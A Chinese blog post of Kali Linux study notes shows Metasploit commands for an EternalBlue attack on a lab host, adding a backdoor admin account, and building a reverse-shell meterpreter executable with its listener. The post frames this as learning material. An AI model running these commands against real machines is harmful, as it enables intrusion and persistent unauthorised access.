kali-安全渗透学习-01

最新推荐文章于 2024-05-20 17:16:41 发布
最新推荐文章于 2024-05-20 17:16:41 发布
阅读量131 收藏
点赞数
分类专栏: 网络安全学习笔记 文章标签: 安全 学习 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/python10101/article/details/130749469
版权

kali-学习

在这里插入图片描述

资料仅用于个人学习,恶意攻击互联网网站及操作系统属于违法行为!!

1、安装与部署kali

2、metasploit工具

msfconsole
在这里插入图片描述

2.1、metasploit攻击windows操作系统

msf使用法则:
使用模块--配置模块必选项--运行模块

示例:永恒之蓝445漏洞攻击

2.1.1、查找模块

		msf6 > search  ms17_010

2.1.2、使用模块

		msf6 > use exploit/windows/smb/ms17_010_eternalblue

2.1.3、设置必选项(Required:yes为必填)

		sf6 exploit(windows/smb/ms17_010_eternalblue) > show options

2.1.4、设置模块

		msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.63.139
		RHOSTS => 192.168.63.139
		msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 9999
		LPORT => 9999

2.1.5、运行

		run

2.1.6、攻击成功
在这里插入图片描述

成功后的操作

help可以查看可以执行的操作

例如:创建后门用户并开启远程连接

meterpreter > shell
C:\Windows\system32>net user zhangsan 123456 /add && net localgroup administrator zhangsan /add

2.2、生成远控木马

2.2.1 windows可执行程序后门(不能绕过杀毒软件)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.63.129 lport=9999 -f exe  -o demo9999.exe

在这里插入图片描述
2.2.2、执行木马监控

		msfconsole
		msf6 > use exploit/multi/handler 
		msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
		msf6 exploit(multi/handler) > set LHOST 192.168.63.129
		msf6 exploit(multi/handler) > set LPORT 9999
		run

在这里插入图片描述
当某台主机点击前期生成的木马程序时
在这里插入图片描述

深度学习0407
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali安全渗透高级工程师-2019年-学习必备软件包汇总
11-10
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook。资源包括但不限于kail、xp等一些镜像,xem5安装包与序列号、Linux视频教程以及其他常用渗透测试工具。
MSF安装与简单使用
qq_23435961的博客
05-17 2903
MSF安装与使用 建议直接安装KaliKali是以Linux系统进行封装的。Kali系统的优点在于这个系统集合了大量的优秀的安全工具,同时还能对这些工具进行升级。其中也包含了MSF。建议是用虚拟机来运行kali系统 Kali安装可参考链接https://blog.csdn.net/qq_23435961/article/details/124821168?spm=1001.2014.3001.5502 一、远程进入MSF 打开Xshell,连接Kali系统, Linux kali 5.16.0-kali7
kali_msf6_渗透
摸鱼域的空气。
01-27 9370
奶奶曾说过,证明自己学懂的方式就是教会别人。 工具简介: msf全称Metasploit是H.D. Moore在2003年开发的,它是少数几个可用于执行诸多渗透测试步骤的工具。在发现新漏洞时(这是很常见的),Metasploit会监控Rapid7,然后Metasploit的200,000多个用户会将漏洞添加到Metasploit的目录上。然后,任何人只要使用Metasploit,就可以用它来测试特定系统的是否有这个漏洞。 通俗来说msf就是一个渗透的工具包,初学者可以从kali开始了解,因为k.
通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作
weixin_60182338的博客
03-17 2644
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击
kali 升级msf到msf6
liulanghouzi的博客
12-04 5586
安装kali过程注意不要使用网络镜像,以及将grub安装至硬盘时选择/dev/sda,其它一律默认即可 安装kali后,启动msf,发现版本很旧,没有近期的cve,打算升级一下。 但是输入apt-get update;apt-get install metasploit-framework,告诉我msf已经是最新,无须更新。 原因是安装kali时没有使用网络镜像,启动kali后又没有设置apt源,没有源当然无法更新啊。 打开/etc/apt/sources.list,添加国内镜像源: deb
kali 下metasploit (msf)初始化使用
热门推荐
StriveBen的博客
06-14 2万+
首先启动postgresql,命令在图中; 然后初始化数据库 进入msf框架 查看一下数据库状态 如果不太熟悉,可以查看具体使用手册 如果执行search时,很慢,而且还提示Module database cache not build yet的话, 我们可以这样解决问题 将数据库再次初始化,并且重新建一下cache,再试一下是不是很快了。
网络安全--Kali渗透Windows
夜思红尘的博客
05-14 1157
Kali里的msfvenom木马制作工具是一个十分好用的工具,这篇文章主要讲述的就是这个msfvenom工具
【测试】Kali Linux 渗透安全学习笔记(1) - Docker Kali 部署与安装软件
Kida 的技术小屋(CSDN 版)
07-29 1529
恰逢要做这个渗透方面的事情,于是...挖了个新坑。不过这个坑估计比较难填,毕竟做自家公司的渗透内容会比较敏感,看看信息脱敏后的效果如何吧,尽可能更新。
Kali-linux渗透攻击应用
2301_77162959的博客
05-17 2273
前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。
kali-linux-08-06-2019.rar
06-03
kali-linux的最小集合安装包,他只包含了必要的组件,轻巧,简约。适合自定义安装kali-linux,安全工作者和黑客的必备工具系统。如果你想成为网络安全工作者,或是想学习黑客知识。它将是你的好伙伴。
Kali-Linux无线网络渗透测试详解
06-22
Kali Linux无线网络渗透测试详解》是国内第一本无线网络安全渗透测试图书。本书基于Kali Linux操作系统,由浅入深,全面而系统地介绍了无线网络渗透技术。本书针对不同的加密方式的工作原理及存在的漏洞进行了详细...
Kali Linux安全渗透教程新手版
12-06
Kali Linux安全渗透教程新手版,有利有新手的学习
Kali Linux安全渗透
01-02
Kali Linux安全渗透进行学习,有利于新人对linux核心如何运作有进一步了解
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 650
作用就是定义属性之间的数学关系
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 360
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 920
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 464
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
Web应用防火墙的重要性
最新发布
XRY_XIAO的博客
05-20 349
Web应用防火墙的重要性
kali-rolling 测试工具
09-19
Kali Linux是一个基于Debian的Linux发行版,主要用于渗透测试和网络安全评估。其中Kali-rolling是Kali Linux的滚动发行版,意味着它是一个持续更新的版本,而不是像以前的发行版那样有一个新版本发布。 Kali-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

深度学习0407

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值